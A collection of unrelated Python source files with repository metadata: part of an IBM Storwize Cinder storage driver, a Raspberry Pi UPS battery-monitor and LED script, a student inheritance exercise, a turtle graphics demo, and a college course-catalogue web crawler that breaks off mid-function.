"""Return size of an existing Vdisk for manage_existing.
existing_ref is a dictionary of the form:
{'source-id': <uid of disk>} or
{'source-name': <name of the disk>}
Optional elements are:
'manage_if_in_use': True/False (default is False)
If set to True, a volume will be managed even if it is currently
attached to a host system.
"""
# Check that the reference is valid
vdisk = self._manage_input_check(ref)
# Check if the disk is in use, if we need to.
manage_if_in_use = ref.get('manage_if_in_use', False)
if (not manage_if_in_use and
self._helpers.is_vdisk_in_use(vdisk['name'])):
reason = _('The specified vdisk is mapped to a host.')
raise exception.ManageExistingInvalidReference(existing_ref=ref,
reason=reason)
return int(math.ceil(float(vdisk['capacity']) / units.Gi))
def unmanage(self, volume):
"""Remove the specified volume from Cinder management."""
pass
def get_volume_stats(self, refresh=False):
"""Get volume stats.
If we haven't gotten stats yet or 'refresh' is True,
run update the stats first.
"""
if not self._stats or refresh:
self._update_volume_stats()
return self._stats
def create_consistencygroup(self, context, group):
"""Create a consistency group.
IBM Storwize will create CG until cg-snapshot creation,
db will maintain the volumes and CG relationship.
"""
LOG.debug("Creating consistency group.")
model_update = {'status': fields.ConsistencyGroupStatus.AVAILABLE}
return model_update
def delete_consistencygroup(self, context, group, volumes):
"""Deletes a consistency group.
IBM Storwize will delete the volumes of the CG.
"""
LOG.debug("Deleting consistency group.")
model_update = {}
model_update['status'] = fields.ConsistencyGroupStatus.DELETED
volumes = self.db.volume_get_all_by_group(context, group['id'])
for volume in volumes:
try:
self._helpers.delete_vdisk(volume['name'], True)
volume['status'] = 'deleted'
except exception.VolumeBackendAPIException as err:
volume['status'] = 'error_deleting'
if model_update['status'] != 'error_deleting':
model_update['status'] = 'error_deleting'
LOG.error(_LE("Failed to delete the volume %(vol)s of CG. "
"Exception: %(exception)s."),
{'vol': volume['name'], 'exception': err})
return model_update, volumes
def update_consistencygroup(self, ctxt, group, add_volumes,
remove_volumes):
"""Adds or removes volume(s) to/from an existing consistency group."""
LOG.debug("Updating consistency group.")
return None, None, None
def create_consistencygroup_from_src(self, context, group, volumes,
cgsnapshot=None, snapshots=None,
source_cg=None, source_vols=None):
"""Creates a consistencygroup from source.
:param context: the context of the caller.
:param group: the dictionary of the consistency group to be created.
:param volumes: a list of volume dictionaries in the group.
:param cgsnapshot: the dictionary of the cgsnapshot as source.
:param snapshots: a list of snapshot dictionaries in the cgsnapshot.
:param source_cg: the dictionary of a consistency group as source.
:param source_vols: a list of volume dictionaries in the source_cg.
:return model_update, volumes_model_update
"""
LOG.debug('Enter: create_consistencygroup_from_src.')
if cgsnapshot and snapshots:
cg_name = 'cg-' + cgsnapshot.id
sources = snapshots
elif source_cg and source_vols:
cg_name = 'cg-' + source_cg.id
sources = source_vols
else:
error_msg = _("create_consistencygroup_from_src must be "
"creating from a CG snapshot, or a source CG.")
raise exception.InvalidInput(reason=error_msg)
LOG.debug('create_consistencygroup_from_src: cg_name %(cg_name)s'
' %(sources)s', {'cg_name': cg_name, 'sources': sources})
self._helpers.create_fc_consistgrp(cg_name)
timeout = self.configuration.storwize_svc_flashcopy_timeout
model_update, snapshots_model = (
self._helpers.create_cg_from_source(group,
cg_name,
sources,
volumes,
self._state,
self.configuration,
timeout))
LOG.debug("Leave: create_consistencygroup_from_src.")
return model_update, snapshots_model
def create_cgsnapshot(self, ctxt, cgsnapshot, snapshots):
"""Creates a cgsnapshot."""
# Use cgsnapshot id as cg name
cg_name = 'cg_snap-' + cgsnapshot['id']
# Create new cg as cg_snapshot
self._helpers.create_fc_consistgrp(cg_name)
snapshots = self.db.snapshot_get_all_for_cgsnapshot(
ctxt, cgsnapshot['id'])
timeout = self.configuration.storwize_svc_flashcopy_timeout
model_update, snapshots_model = (
self._helpers.run_consistgrp_snapshots(cg_name,
snapshots,
self._state,
self.configuration,
timeout))
return model_update, snapshots_model
def delete_cgsnapshot(self, context, cgsnapshot, snapshots):
"""Deletes a cgsnapshot."""
cgsnapshot_id = cgsnapshot['id']
cg_name = 'cg_snap-' + cgsnapshot_id
snapshots = self.db.snapshot_get_all_for_cgsnapshot(context,
cgsnapshot_id)
model_update, snapshots_model = (
self._helpers.delete_consistgrp_snapshots(cg_name,
snapshots))
return model_update, snapshots_model
def get_pool(self, volume):
attr = self._helpers.get_vdisk_attributes(volume['name'])
if attr is None:
msg = (_('get_pool: Failed to get attributes for volume '
'%s') % volume['name'])
LOG.error(msg)
raise exception.VolumeDriverException(message=msg)
return attr['mdisk_grp_name']
def _update_volume_stats(self):
"""Retrieve stats info from volume group."""
LOG.debug("Updating volume stats.")
data = {}
data['vendor_name'] = 'IBM'
data['driver_version'] = self.VERSION
data['storage_protocol'] = self.protocol
data['pools'] = []
data['multiattach'] = (self.configuration.
storwize_svc_multihostmap_enabled)
backend_name = self.configuration.safe_get('volume_backend_name')
data['volume_backend_name'] = (backend_name or
self._state['system_name'])
data['pools'] = [self._build_pool_stats(pool)
for pool in
self.configuration.storwize_svc_volpool_name]
data['replication'] = self._replication_enabled
data['replication_enabled'] = self._replication_enabled
data['replication_targets'] = self._get_replication_targets(),
self._stats = data
def _build_pool_stats(self, pool):
"""Build pool status"""
QoS_support = True
pool_stats = {}
try:
pool_data = self._helpers.get_pool_attrs(pool)
if pool_data:
easy_tier = pool_data['easy_tier'] in ['on', 'auto']
total_capacity_gb = float(pool_data['capacity']) / units.Gi
free_capacity_gb = float(pool_data['free_capacity']) / units.Gi
allocated_capacity_gb = (float(pool_data['used_capacity']) /
units.Gi)
location_info = ('StorwizeSVCDriver:%(sys_id)s:%(pool)s' %
{'sys_id': self._state['system_id'],
'pool': pool_data['name']})
pool_stats = {
'pool_name': pool_data['name'],
'total_capacity_gb': total_capacity_gb,
'free_capacity_gb': free_capacity_gb,
'allocated_capacity_gb': allocated_capacity_gb,
'compression_support': self._state['compression_enabled'],
'reserved_percentage':
self.configuration.reserved_percentage,
'QoS_support': QoS_support,
'consistencygroup_support': True,
'location_info': location_info,
'easytier_support': easy_tier
}
if self._replication_enabled:
pool_stats.update({
'replication_enabled': self._replication_enabled,
'replication_type': self._supported_replication_types,
'replication_targets': self._get_replication_targets(),
'replication_count': len(self._replication_targets)
})
elif self.replication:
pool_stats.update(self.replication.get_replication_info())
except exception.VolumeBackendAPIException:
msg = _('Failed getting details for pool %s.') % pool
raise exception.VolumeBackendAPIException(data=msg)
return pool_stats
def _get_replication_targets(self):
return [target['backend_id'] for target in self._replication_targets]
def _manage_input_check(self, ref):
"""Verify the input of manage function."""
# Check that the reference is valid
if 'source-name' in ref:
manage_source = ref['source-name']
vdisk = self._helpers.get_vdisk_attributes(manage_source)
elif 'source-id' in ref:
manage_source = ref['source-id']
vdisk = self._helpers.vdisk_by_uid(manage_source)
else:
reason = _('Reference must contain source-id or '
'source-name element.')
raise exception.ManageExistingInvalidReference(existing_ref=ref,
reason=reason)
if vdisk is None:
reason = (_('No vdisk with the UID specified by ref %s.')
% manage_source)
raise exception.ManageExistingInvalidReference(existing_ref=ref,
reason=reason)
return vdisk
| [
"yongle.li@gmail.com"
] | yongle.li@gmail.com |
6ad630abf6253cb5e5c5e807b26864f05dec66e7 | 7ad570c16d54835f79e657b40c8162e25365f724 | /smartups.py | 2a15664737205f9e09a4dc13e8f86a1ac136ffac | [] | no_license | u-geek/SmartUPSV3 | 1741e3a21c5b75874a8f5e5a1685f3de6ff9b37c | d26516a261f39bf8499e82242ffcbe11b1900526 | refs/heads/master | 2023-04-30T09:02:16.814818 | 2021-05-18T09:08:33 | 2021-05-18T09:08:33 | 264,562,640 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 13,069 | py | # coding=UTF-8
#
# U-GEEK Raspi Smart UPS HAT V3
#
import os
import time
import smbus
import signal
import logging
import threading
from neopixel import *
from logging.handlers import RotatingFileHandler
# Global settings
BUS_ADDR = 1
disconnectflag = False
exit_thread = False
max17048_soc = 0
POWEROFF_POWER = 5
count = 0
#MAX17048 settings
MAX17048_ADDR = 0x36
# BQ25895 setgins
BQ25895_ADDRESS = 0x6A
REG_WATCHDOG = 0x07
BYTE_WATCHDOG_STOP = 0b10001101 #Stop Watchdog timer
REG_ILIM = 0x00 #ILIM register
#BYTE_ILIM = 0b01101000 #2A input current limit
#BYTE_ILIM = 0b01111100 #3A input current limit
BYTE_ILIM = 0b01111111 #3.25A input current limit
REG_ICHG = 0x04
BYTE_ICHG = 0b01111111 #.5A charging current limit
REG_CONV_ADC = 0x02
REG_BATFET = 0x09
BYTE_BATFET = 0b01001000 #delay before battery == disconnected
BAT_CAPACITY = 2500 #Battery capacity in mah
CURRENT_DRAW = 2000 #Current draw in mah
REG_CONV_ADC = 0x02
BYTE_CONV_ADC_START = 0b10011101
BYTE_CONV_ADC_STOP = 0b00011101
REG_BATFET_DIS = 0x09
BYTE_BATFET_DIS = 0b01101000
REG_STATUS = 0x0B #address of status register
REG_BATV = 0x0e
REG_FAULT = 0x0c
REG_BATI = 0x12
# WS2812 settings
LED_COUNT = 16 # Number of LED pixels.
LED_PIN = 18
# LED_PIN = 10 # GPIO pin connected to the pixels (10 uses SPI /dev/spidev0.0).
LED_FREQ_HZ = 800000 # LED signal frequency in hertz (usually 800khz)
LED_DMA = 10 # DMA channel to use for generating signal (try 10)
LED_BRIGHTNESS = 26
LED_INVERT = False # True to invert the signal (when using NPN transistor level shift)
LED_CHANNEL = 0 # set to '1' for GPIOs 13, 19, 41, 45 or 53
# LED Color
COLOR_RED = Color(0,255,0)
COLOR_GREEN = Color(255,0,0)
COLOR_BLUE = Color(0,0,255)
COLOR_YELLOW = Color(255,255,0)
COLOR_PURPLE = Color(0,255,255)
COLOR_CYAN = Color(255,0,255)
COLOR_WHITE = Color(255,255,255)
COLOR_BLACK = Color(0,0,0)
# Init i2c bus
def init_i2c():
global bus
bus = smbus.SMBus(BUS_ADDR)
# Init max17048
def max17048_init():
bus.write_word_data(MAX17048_ADDR, 0xFE ,0xFFFF)
return True
# Get voltage from max17048
def max17048_getstatus():
global max17048_v, max17048_soc
max17048_v_16 = bus.read_word_data(MAX17048_ADDR, 0x02);
soc = bus.read_word_data(MAX17048_ADDR, 0x04);
max17048_v = (((max17048_v_16 & 0x00FF) << 8) + (max17048_v_16 >> 8)) * 78.125 / 1000000
max17048_soc = (((soc & 0x00FF) << 8) + (soc >> 8)) / 256
# Init bq25895
def bq25895_init():
bus.write_byte_data(BQ25895_ADDRESS, REG_WATCHDOG, BYTE_WATCHDOG_STOP)
bus.write_byte_data(BQ25895_ADDRESS, REG_ILIM, BYTE_ILIM)
bus.write_byte_data(BQ25895_ADDRESS, REG_ICHG, BYTE_ICHG)
bus.write_byte_data(BQ25895_ADDRESS, REG_BATFET, BYTE_BATFET)
def bq25895_int_to_bool_list(num):
return [bool(num & (1<<n)) for n in range(8)]
def bq25895_translate(val, in_from, in_to, out_from, out_to):
out_range = out_to - out_from
in_range = in_to - in_from
in_val = val - in_from
val=(float(in_val)/in_range)*out_range
out_val = out_from+val
return out_val
def bq25895_read_reg(reg):
return bus.read_byte_data(BQ25895_ADDRESS, reg)
# BQ25895 read status
def bq25895_read_status():
global SLEEPDELAY, disconnectflag, batpercentprev, bq25895_status
bus.write_byte_data(BQ25895_ADDRESS, REG_CONV_ADC, BYTE_CONV_ADC_START)
sample = bus.read_byte_data(BQ25895_ADDRESS, REG_STATUS)
status = bq25895_int_to_bool_list(sample)
time.sleep(1.2)
sample = bus.read_byte_data(BQ25895_ADDRESS, REG_BATV)
batvbool = bq25895_int_to_bool_list(sample)
bus.write_byte_data(BQ25895_ADDRESS, REG_CONV_ADC, BYTE_CONV_ADC_STOP)
#print(sample)
vsys_stat = status[0]
sdp_stat = status[1]
pg_stat = status[2]
chrg_stat = status[4] * 2 + status[3]
vbus_stat = status[7] * 4 + status[6] * 2 + status[5]
if status[2]:
power = "Connected"
else:
power = "Disconnected"
if status[3] and status[4]:
charge = "Charging done"
elif status[4] and not status[3]:
charge = "Charging"
elif not status[4] and status[3]:
charge = "Pre-Charge"
else:
charge = "Discharging"
#convert batv register to volts
batv = 2.304
batv += batvbool[6] * 1.280
batv += batvbool[5] * 0.640
batv += batvbool[4] * 0.320
batv += batvbool[3] * 0.160
batv += batvbool[2] * 0.08
batv += batvbool[1] * 0.04
batv += batvbool[0] * 0.02
batpercent = bq25895_translate(batv,3.5,4.184,0,1)
if batpercent<0 :
batpercent = 0
elif batpercent >1 :
batpercent = 1
timeleftmin = int( batpercent * 60* BAT_CAPACITY / CURRENT_DRAW)
if timeleftmin < 0 :
timeleftmin = 0
if power == "Connected" :
timeleftmin = -1
if power == "Disconnected" and disconnectflag == False :
disconnectflag = True
message = "echo Power Disconnected, system will shutdown in %d minutes! | wall" % (timeleftmin)
#os.system(message)
if power == "Connected" and disconnectflag == True :
disconnectflag = False
message = "echo Power Restored, battery at %d percent | wall" % (batpercentprev * 100)
#os.system(message)
batpercentprev = batpercent
bq25895_status = {
'Input': power,
'ChargeStatus' : charge,
'BatteryVoltage' : '%.2f' % batv,
"BatteryPercentage" : int(batpercent*100),
'TimeRemaining' : int(timeleftmin)
}
if(batv < 3.5):
bus.write_byte_data(BQ25895_ADDRESS, REG_BATFET_DIS, BYTE_BATFET_DIS)
def print_bq25895status():
print "Input: " , bq25895_status['Input']
print "ChargeStatus: " , bq25895_status['ChargeStatus']
print "BatteryVoltage: " , bq25895_status['BatteryVoltage'], "V"
print "BatteryPercentage: " , bq25895_status['BatteryPercentage'] , "%"
print("VSYS_STAT: ", bin(vsys_stat), "SDP_STAT: ", bin(sdp_stat),
"PG_STAT:", bin(pg_stat), "CHRG_STAT:" , bin(chrg_stat),
"VBUS_STAT:", bin(vbus_stat))
def print_max17048status():
print "Status of max17048:"
print '%.2f' % max17048_v , "V"
print max17048_soc , "%"
print "Status of bq25895:"
# Intialize the library (must be called once before other functions).
def led_init():
global strip
strip = Adafruit_NeoPixel(LED_COUNT, LED_PIN, LED_FREQ_HZ, LED_DMA, LED_INVERT, LED_BRIGHTNESS, LED_CHANNEL)
strip.begin()
def led_off():
strip.setPixelColor(0, COLOR_BLACK)
strip.setPixelColor(1, COLOR_BLACK)
strip.setPixelColor(2, COLOR_BLACK)
strip.setPixelColor(3, COLOR_BLACK)
strip.show()
def led_full():
strip.setPixelColor(0, COLOR_GREEN)
strip.setPixelColor(1, COLOR_GREEN)
strip.setPixelColor(2, COLOR_GREEN)
strip.setPixelColor(3, COLOR_GREEN)
strip.show()
# pre-charge
# led 1,2,3,4 flash
def led_precharge():
for i in range(0,255):
if exit_thread:
return
strip.setPixelColor(0, Color(i,0,0))
strip.setPixelColor(1, Color(i,0,0))
strip.setPixelColor(2, Color(i,0,0))
strip.setPixelColor(3, Color(i,0,0))
strip.show()
time.sleep(0.005)
for i in range(255,0,-1):
if exit_thread:
return
strip.setPixelColor(0, Color(i,0,0))
strip.setPixelColor(1, Color(i,0,0))
strip.setPixelColor(2, Color(i,0,0))
strip.setPixelColor(3, Color(i,0,0))
strip.show()
time.sleep(0.005)
time.sleep(1)
# Charging to 25%
# led 1 flash,others black
def led_charginto25():
strip.setPixelColor(0, COLOR_BLACK)
strip.setPixelColor(1, COLOR_BLACK)
strip.setPixelColor(2, COLOR_BLACK)
for i in range(0,255):
if exit_thread:
return
strip.setPixelColor(3, Color(0,0,i))
strip.show()
time.sleep(0.005)
for i in range(255,0,-1):
if exit_thread:
return
strip.setPixelColor(3, Color(0,0,i))
strip.show()
time.sleep(0.005)
time.sleep(1)
# Charging from 25% to 50%
# led 1 green,led 2 flash, others black
def led_chargingto50():
strip.setPixelColor(0, COLOR_BLACK)
strip.setPixelColor(1, COLOR_BLACK)
strip.setPixelColor(3, COLOR_BLUE)
for i in range(0,255):
if exit_thread:
return
strip.setPixelColor(2, Color(0,0,i))
strip.show()
time.sleep(0.005)
for i in range(255,0,-1):
if exit_thread:
return
strip.setPixelColor(2, Color(0,0,i))
strip.show()
time.sleep(0.005)
time.sleep(1)
# Charging from 50% to 75%
# led 1,2 green,led 3 flash, led 4 black
def led_chargingto75():
strip.setPixelColor(0, COLOR_BLACK)
strip.setPixelColor(2, COLOR_BLUE)
strip.setPixelColor(3, COLOR_BLUE)
for i in range(0,255):
if exit_thread:
return
strip.setPixelColor(1, Color(0,0,i))
strip.show()
time.sleep(0.005)
for i in range(255,0,-1):
if exit_thread:
return
strip.setPixelColor(1, Color(0,0,i))
strip.show()
time.sleep(0.005)
time.sleep(1)
# Charging from 75% to 100%
# led 1,2,3 green,led 4 flash
def led_chargingto100():
strip.setPixelColor(1, COLOR_BLUE)
strip.setPixelColor(2, COLOR_BLUE)
strip.setPixelColor(3, COLOR_BLUE)
for i in range(0,255):
if exit_thread:
return
strip.setPixelColor(0, Color(0,0,i))
strip.show()
time.sleep(0.005)
for i in range(255,0,-1):
if exit_thread:
return
strip.setPixelColor(0, Color(0,0,i))
strip.show()
time.sleep(0.005)
time.sleep(1)
# Dischargeing to 75%
def led_dischargeto75():
strip.setPixelColor(0, COLOR_BLACK)
strip.setPixelColor(1, COLOR_GREEN)
strip.setPixelColor(2, COLOR_GREEN)
strip.setPixelColor(3, COLOR_GREEN)
strip.show()
# Discharging to 50%
def led_dischargeto50():
strip.setPixelColor(0, COLOR_BLACK)
strip.setPixelColor(1, COLOR_BLACK)
strip.setPixelColor(2, COLOR_GREEN)
strip.setPixelColor(3, COLOR_GREEN)
strip.show()
# Discharging to 25%
def led_dischargeto25():
strip.setPixelColor(0, COLOR_BLACK)
strip.setPixelColor(1, COLOR_BLACK)
strip.setPixelColor(2, COLOR_BLACK)
strip.setPixelColor(3, COLOR_GREEN)
strip.show()
# Discharging to 10%
def led_dischargeto10():
strip.setPixelColor(0, COLOR_BLACK)
strip.setPixelColor(1, COLOR_BLACK)
strip.setPixelColor(2, COLOR_BLACK)
strip.setPixelColor(3, COLOR_YELLOW)
strip.show()
# Discharging to 0%
def led_dischargeto0():
strip.setPixelColor(0, COLOR_BLACK)
strip.setPixelColor(1, COLOR_BLACK)
strip.setPixelColor(2, COLOR_BLACK)
for i in range(0,255):
if exit_thread:
return
strip.setPixelColor(3, Color(i,i,0))
strip.show()
time.sleep(0.005)
for i in range(255,0,-1):
if exit_thread:
return
strip.setPixelColor(3, Color(i,i,0))
strip.show()
time.sleep(0.005)
time.sleep(1)
def led_show():
while exit_thread is False:
if bq25895_status['Input'] == 'Connected': # Power connected
if bq25895_status['ChargeStatus'] == 'Charging done':
led_full()
elif bq25895_status['ChargeStatus'] == 'Charging':
if max17048_soc > 75:
led_chargingto100()
elif ((max17048_soc > 50) and (max17048_soc <= 75)):
led_chargingto75()
elif ((max17048_soc > 25) and (max17048_soc <= 50)):
led_chargingto50()
else:
led_charginto25()
elif bq25895_status['ChargeStatus'] == 'Pre-Charge':
led_precharge()
elif bq25895_status['ChargeStatus'] == 'Discharging':
led_full()
else:
led_off()
else: # Power Disconnected
if max17048_soc > 90:
led_full()
elif ((max17048_soc > 75) and (max17048_soc <= 90)):
led_dischargeto75()
elif ((max17048_soc > 50) and (max17048_soc <= 75)):
led_dischargeto50()
elif ((max17048_soc > 25) and (max17048_soc <= 50)):
led_dischargeto25()
elif ((max17048_soc > 10) and (max17048_soc <= 25)):
led_dischargeto10()
else:
led_dischargeto0()
led_off()
def stop(sig, frame):
led_off()
exit_thread = True
def ignore(sig, frsma):
led_off()
exit_thread = True
def handler(signum, frame):
print "Signal is received:" + str(signum)
exit_thread=True
thread_led.join()
exit
def handle_signal():
signal.signal(signal.SIGUSR1, handler)
signal.signal(signal.SIGUSR2, handler)
signal.signal(signal.SIGALRM, handler)
signal.signal(signal.SIGINT, handler)
signal.signal(signal.SIGQUIT, handler)
def logging_status():
info = ' Input:' + bq25895_status['Input'] + ' , ChargeStatus: ' + bq25895_status['ChargeStatus'] + ' , SOC:' + str(max17048_soc) + "%"
app_log.info(info)
# Main Loop
if __name__ == '__main__':
log_formatter = logging.Formatter('%(asctime)s %(filename)s : %(levelname)s %(message)s')
log_filename = '/var/log/smartups.log'
log_handler = RotatingFileHandler(log_filename, mode='a', maxBytes=5 * 1024 * 1024,
backupCount=2, encoding=None, delay=0)
log_handler.setFormatter(log_formatter)
log_handler.setLevel(logging.INFO)
app_log = logging.getLogger('root')
app_log.setLevel(logging.DEBUG)
app_log.addHandler(log_handler)
init_i2c()
max17048_init()
bq25895_init()
bq25895_read_status()
led_init()
led_precharge()
thread_led = threading.Thread(target=led_show)
thread_led.start()
try:
while (True):
max17048_getstatus()
bq25895_read_status()
logging_status()
if ((bq25895_status['Input'] != 'Connected') and (max17048_soc < POWEROFF_POWER)):
count = count + 1
#print bq25895_status['Input']
if count > 10:
logging.warning("Shutdown")
os.system("sudo halt -h")
#print bq25895_status['Input']
#print " Charge status:" , bq25895_status['ChargeStatus'], " soc: ", max17048_soc
except:
exit_thread=True
thread_led.join()
exit
| [
"howard.qiao@u-geek.net"
] | howard.qiao@u-geek.net |
735e88cdd3e9e2d80925c43fd342adb28accaf4b | cae2711e78be547681ff5635bd00f8fb9fee1b9f | /AnimalAssignment/AssignmentAnimal.py | 03c4e06c49793010460175dd395cb261ce92e8f9 | [] | no_license | RoselinBurgos/CodingDojo-Python | 1ac049d56292f078fda2bf11749acfe1bdd3e980 | 1a7507fcdeeaa20fcb940ed8b9e30fb433d43d78 | refs/heads/master | 2020-04-09T14:41:19.607926 | 2018-12-04T21:02:22 | 2018-12-04T21:02:22 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,130 | py | # Create an Animal class and give it the below attributes and methods.
# Extend the Animal class to two child classes, Dog and Dragon.
# Objective
# The objective of this assignment is to help you understand inheritance.
# Remember that a class is more than just a collection of properties and methods.
# If you want to create a new class with attributes and methods that are already defined in another class,
# you can have this new class inherit from that other class (called the parent) instead of copying and pasting code from the original class.
# Child classes can access all the attributes and methods of a parent class AND have new attributes and methods of its own,
# for child instances to call. As we see with Wizard / Ninja / Samurai (that are each descended from Human),
# we can have numerous unique child classes that inherit from the same parent class.
# Animal Class
# Attributes:
# • name
# • health
# Methods:
# • walk: decreases health by one
# • run: health decreases by five
# • display health: print to the terminal the animal's health.
# Create an instance of the Animal, have it walk() three times, run() twice, and finally displayHealth() to confirm that the health attribute has changed.
# Dog Class
# • inherits everything from Animal
# Attributes:
# • default health of 150
# Methods:
# • pet: increases health by 5
# Have the Dog walk() three times, run() twice, pet() once, and have it displayHealth().
# Dragon Class
# • inherits everything from Animal
# Attributes:
# • default health of 170
# Methods:
# • fly: decreases health by 10
# • display health: prints health by calling the parent method and prints "I am a Dragon"
# Now try creating a new Animal and confirm that it can not call the pet() and fly() methods,
# and its displayHealth() is not saying 'this is a dragon!'. Also confirm that your Dog class can not fly().
class Animal:
def __init__(self,name):
self.name = name
self.health = 100
def walk(self):
self.health -= 1
print("Walking")
return self
def run(self):
self.health -= 5
print("Running")
return self
def display_health(self):
print("My name is " +str(self.name))
print("Health " + str(self.health))
return self
class Dog(Animal):
def __init__(self,name):
super().__init__(name)
self.health = 150
def pet(self):
self.health += 5
print("Petting")
return self
class Dragon(Animal):
def __init__(self,name):
super().__init__(name)
self.health = 170
def fly(self):
self.health += 10
print("Flying")
return self
def display_health(self):
print("My name is " +str(self.name))
print("I AM A DRAGON!")
return self
animal1 = Animal("Jax")
animal1.walk().walk().walk().run().run().display_health()
animal2 = Dog("Dexter")
animal2.walk().walk().walk().run().run().pet().display_health()
animal3 = Dragon("Elliot")
animal3.fly().fly().display_health()
| [
"RoselinBurgos.com"
] | RoselinBurgos.com |
98d29b8ee00151cf5694bb05f8a21fcda2e47eda | caee3d333a6f8115f99c7a33138d2a2a2d8e9678 | /V_turtle1.py | b5d69dd076d43978d68fc4ab6b4fd99df22a4076 | [] | no_license | VishalGupta2597/batch89 | c24e004ce4beee075a0e75f740e1afdae724f992 | b11cfbcccb3884e06190938f8ca6272a41161366 | refs/heads/master | 2022-01-22T10:02:46.204693 | 2019-08-01T02:39:51 | 2019-08-01T02:39:51 | 197,910,034 | 2 | 1 | null | 2019-07-20T09:39:48 | 2019-07-20T09:39:47 | null | UTF-8 | Python | false | false | 619 | py | from turtle import *
s = Turtle() #s is the object of Turtle class
w = Screen() #w is the object of Screen claa
s.shape("turtle")
s.speed(1)
w.title("Vish Turtle")
#s.write("Vishal")
#w.bgcolor("yellow")
s.color("green")
s.pencolor("Blue")
s.pensize(5)
"""s.begin_fill()
for i in range(4):
s.forward(100)
s.left(90)
s.end_fill()
s.up()
s.backward(150)
s.down()
s.color("orange")
s.pencolor('blue')
s.begin_fill()
for j in range(4):
s.forward(100)
s.left(90)
s.end_fill()"""
s.up()
s.goto(-100,90)
s.down()
s.begin_fill()
s.stamp()
s.shape('circle')
s.circle(100,steps=10)
s.end_fill()
done() | [
"vishalg2597@gmail.com"
] | vishalg2597@gmail.com |
a81e55d98b7ef096729671d0cc633f724691b3c7 | ddada1d76aa4cb426040662bac084832f0079f10 | /WebCrawler2.py | ff784eee092f6101e1fe01b3353b3d081f1a63f0 | [] | no_license | cs257f19/web-project-web-project-team-a | e5f002c312d6e60f3dae2c0d7ba582311e4b1059 | 842d6fdb694f88744cdce7439296f6bb078e4304 | refs/heads/master | 2021-07-07T07:50:13.268502 | 2019-11-26T03:42:22 | 2019-11-26T03:42:22 | 213,968,989 | 0 | 1 | null | 2020-12-15T17:36:22 | 2019-10-09T16:31:22 | HTML | UTF-8 | Python | false | false | 10,360 | py | import requests
from lxml.html import fromstring
import csv
import unidecode
master_list = []
class Course:
"""
Course subclass with instance variables for metadata of the course
"""
def __init__(self, dept, num, name, term, reqs, periods, prof, desc):
"""
Course object constructor
:param dept: department code
:param num: course number
:param name: course name
:param term: term offered
:param reqs: liberal arts requirements fulfilled by course
:param periods: class period(s) offered
:param prof: professor who teaches the course
:param desc: the course description
"""
self.dept = dept
self.num = num
self.name = name
self.term = term
self.reqs = reqs
self.periods = periods
self.prof = prof
self.desc = desc
departments = ['AFST', 'AMMU', 'AMST', 'ARBC', 'ARCN', 'ARTH', 'ASLN', 'ASST', 'ASTR', 'BIOL', 'CHEM', 'CHIN', 'CAMS',
'CLAS', 'CGSC', 'CS', 'CCST', 'DANC', 'DGAH', 'ECON', 'EDUC', 'ENGL', 'ENTS', 'EUST', 'FREN', 'GEOL',
'GERM', 'GRK', 'HEBR', 'HIST', 'IDSC', 'JAPN', 'LATN', 'LTAM', 'LING', 'LCST', 'MATH', 'MARS', 'MEST',
'MELA', 'MUSC', 'NEUR', 'PHIL', 'PE', 'PHYS', 'POSC', 'PSYC', 'RELG', 'RUSS', 'SOAN', 'SPAN', 'ANCE',
'ARTS', 'THEA', 'WGST']
terms = ['19FA', '20WI', '20SP']
def collect_dept(dept_iter):
"""
returns the department code for a given department iteration
:param dept_iter: location within departments list as it's being iterated through
:return: department code
"""
return departments[dept_iter]
def collect_nums(tree, i):
"""
returns the course number contained within the XPath
:param tree: tree containing all HTML elements of the current page
:param i: iterator variable for current course being inspected
:return: course number associated with course at position i in the list of courses w/in the tree
"""
string = str(tree.xpath('//*[@id="enrollModule"]/div[1]/div[' + str(i) + ']/h3/span[1]/text()'))
number = float(''.join(filter(lambda x: x.isdigit() or x == '.', string)))
return number
def collect_name(tree, i):
"""
returns the course name contained within the XPath
:param tree: tree containing all HTML elements of the current page
:param i: iterator variable for current course being inspected
:return: course name associated with course at position i in the list of courses w/in the tree
"""
string = str(tree.xpath('//*[@id="enrollModule"]/div/div[' + str(i) + ']/h3/text()')[0])
return string[1:-1]
def collect_terms(term_iter):
"""
retrieves the term based on the iteration of the for-loop running in crawl_department
:param term_iter: iterative variable associated with Fall, Winter or Spring
:return: the term the course is offered in
"""
if term_iter == 0:
return 'Fall 2019'
elif term_iter == 1:
return 'Winter 2020'
elif term_iter == 2:
return 'Spring 2020'
return 'Term not found'
def collect_reqs(tree, course_iter):
"""
returns the liberal arts requirements contained within the XPath, associated with the course at course_iter
:param tree: the tree containing all HTML elements of the page currently being crawled
:param course_iter: iterative variable to point at the element within the XPath for the current course
:return: liberal arts requirements fulfilled by the course
"""
reqs = []
for i in range(1, 4):
string = str(tree.xpath(
'//*[@id="enrollModule"]/div[1]/div[' + str(course_iter) + ']/div[1]/div[2]/ul/li[' + str(
i) + ']/a/text()'))
if "Formal" in string:
reqs.append("FSR")
if "Quantitative" in string:
reqs.append("QRE")
if "Argument & Inquiry" in string:
reqs.append("AI")
if "Writing " in string:
reqs.append("WRC")
if "Intercultural Dom" in string:
reqs.append("IDS")
if "Social" in string:
reqs.append("SOC")
if "Humanistic" in string:
reqs.append("HUM")
if "International" in string:
reqs.append("INS")
if "Lab" in string:
reqs.append("LAB")
if "Arts" in string:
reqs.append("ARP")
if "Literary" in string:
reqs.append("LAA")
if "PE" in string:
reqs.append("PER")
if len(reqs) == 0:
return ''
return str(reqs).replace('\'', '').replace('[', '').replace(']', '').replace('\"', '')
def collect_period(tree, course_iter):
"""
returns the class periods for which the course is offered contained within the XPath, associated with the course at
course_iter
:param tree: the tree containing all HTML elements of the page currently being crawled
:param course_iter: iterative variable to point at the element within the XPath for the current course
:return: class period for which the course is offered
"""
start_time = str(tree.xpath('//*[@id="enrollModule"]/div/div[' + str(course_iter) + ']/div[1]/div['
'1]/table/tbody/tr/td['
'1]/span[1]/text()'))
# the class is MWF
if start_time != '[]':
if '8:30' in start_time:
return '1a'
elif '9:50' in start_time:
return '2a'
elif '11:10' in start_time:
return '3a'
elif '12:30' in start_time:
return '4a'
elif '1:50' in start_time:
return '5a'
elif '3:10' in start_time:
return '6a'
# the class is T/Th
else:
start_time = str(tree.xpath('//*[@id="enrollModule"]/div/div[' + str(course_iter) + ']/div[1]/div['
'1]/table/tbody/tr/td['
'2]/span[1]/text()'))
if '8:15' in start_time:
return '1/2c'
elif '10:10' in start_time:
return '2/3c'
elif '1:15' in start_time:
return '4/5c'
